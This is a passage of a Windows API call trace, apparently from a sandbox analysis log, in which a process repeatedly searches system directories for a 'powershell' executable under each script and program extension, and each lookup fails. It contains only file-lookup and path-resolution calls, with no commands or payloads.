	[0777.017] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.017] SetErrorMode (uMode=0x1) returned 0x1
	[0777.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.017] SetErrorMode (uMode=0x1) returned 0x1
	[0777.017] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.018] SetErrorMode (uMode=0x1) returned 0x1
	[0777.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.018] SetErrorMode (uMode=0x1) returned 0x1
	[0777.018] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.018] SetErrorMode (uMode=0x1) returned 0x1
	[0777.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.019] SetErrorMode (uMode=0x1) returned 0x1
	[0777.019] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.019] SetErrorMode (uMode=0x1) returned 0x1
	[0777.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.019] SetErrorMode (uMode=0x1) returned 0x1
	[0777.020] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.020] SetErrorMode (uMode=0x1) returned 0x1
	[0777.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.020] SetErrorMode (uMode=0x1) returned 0x1
	[0777.020] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.020] SetErrorMode (uMode=0x1) returned 0x1
	[0777.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.021] SetErrorMode (uMode=0x1) returned 0x1
	[0777.021] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.021] SetErrorMode (uMode=0x1) returned 0x1
	[0777.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.022] SetErrorMode (uMode=0x1) returned 0x1
	[0777.022] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.022] SetErrorMode (uMode=0x1) returned 0x1
	[0777.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0777.022] SetErrorMode (uMode=0x1) returned 0x1
	[0777.022] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.023] SetErrorMode (uMode=0x1) returned 0x1
	[0777.023] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.023] SetErrorMode (uMode=0x1) returned 0x1
	[0777.023] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.023] SetErrorMode (uMode=0x1) returned 0x1
	[0777.024] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.024] SetErrorMode (uMode=0x1) returned 0x1
	[0777.024] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.024] SetErrorMode (uMode=0x1) returned 0x1
	[0777.024] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.024] SetErrorMode (uMode=0x1) returned 0x1
	[0777.024] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.025] SetErrorMode (uMode=0x1) returned 0x1
	[0777.025] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.025] SetErrorMode (uMode=0x1) returned 0x1
	[0777.025] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.025] SetErrorMode (uMode=0x1) returned 0x1
	[0777.026] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.026] SetErrorMode (uMode=0x1) returned 0x1
	[0777.026] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.026] SetErrorMode (uMode=0x1) returned 0x1
	[0777.026] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.026] SetErrorMode (uMode=0x1) returned 0x1
	[0777.027] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.027] SetErrorMode (uMode=0x1) returned 0x1
	[0777.027] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.027] SetErrorMode (uMode=0x1) returned 0x1
	[0777.027] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.027] SetErrorMode (uMode=0x1) returned 0x1
	[0777.028] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.028] SetErrorMode (uMode=0x1) returned 0x1
	[0777.028] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.028] SetErrorMode (uMode=0x1) returned 0x1
	[0777.028] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.028] SetErrorMode (uMode=0x1) returned 0x1
	[0777.029] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.029] SetErrorMode (uMode=0x1) returned 0x1
	[0777.029] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.029] SetErrorMode (uMode=0x1) returned 0x1
	[0777.029] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.029] SetErrorMode (uMode=0x1) returned 0x1
	[0777.030] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.030] SetErrorMode (uMode=0x1) returned 0x1
	[0777.030] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.030] SetErrorMode (uMode=0x1) returned 0x1
	[0777.030] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.030] SetErrorMode (uMode=0x1) returned 0x1
	[0777.031] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.031] SetErrorMode (uMode=0x1) returned 0x1
	[0777.031] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.031] SetErrorMode (uMode=0x1) returned 0x1
	[0777.031] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.031] SetErrorMode (uMode=0x1) returned 0x1
	[0777.032] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.032] SetErrorMode (uMode=0x1) returned 0x1
	[0777.032] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.032] SetErrorMode (uMode=0x1) returned 0x1
	[0777.032] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0777.033] SetErrorMode (uMode=0x1) returned 0x1
	[0777.033] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.033] SetErrorMode (uMode=0x1) returned 0x1
	[0777.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0777.034] SetErrorMode (uMode=0x1) returned 0x1
	[0777.034] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.034] SetErrorMode (uMode=0x1) returned 0x1
	[0777.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0777.034] SetErrorMode (uMode=0x1) returned 0x1
	[0777.034] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.035] SetErrorMode (uMode=0x1) returned 0x1
	[0777.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0777.035] SetErrorMode (uMode=0x1) returned 0x1
	[0777.035] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.035] SetErrorMode (uMode=0x1) returned 0x1
	[0777.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0777.036] SetErrorMode (uMode=0x1) returned 0x1
	[0777.036] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0777.036] SetErrorMode (uMode=0x1) returned 0x1
	[0778.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0778.365] SetErrorMode (uMode=0x1) returned 0x1
	[0778.366] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.366] SetErrorMode (uMode=0x1) returned 0x1
	[0778.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0778.366] SetErrorMode (uMode=0x1) returned 0x1
	[0778.366] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.367] SetErrorMode (uMode=0x1) returned 0x1
	[0778.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0778.367] SetErrorMode (uMode=0x1) returned 0x1
	[0778.367] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.367] SetErrorMode (uMode=0x1) returned 0x1
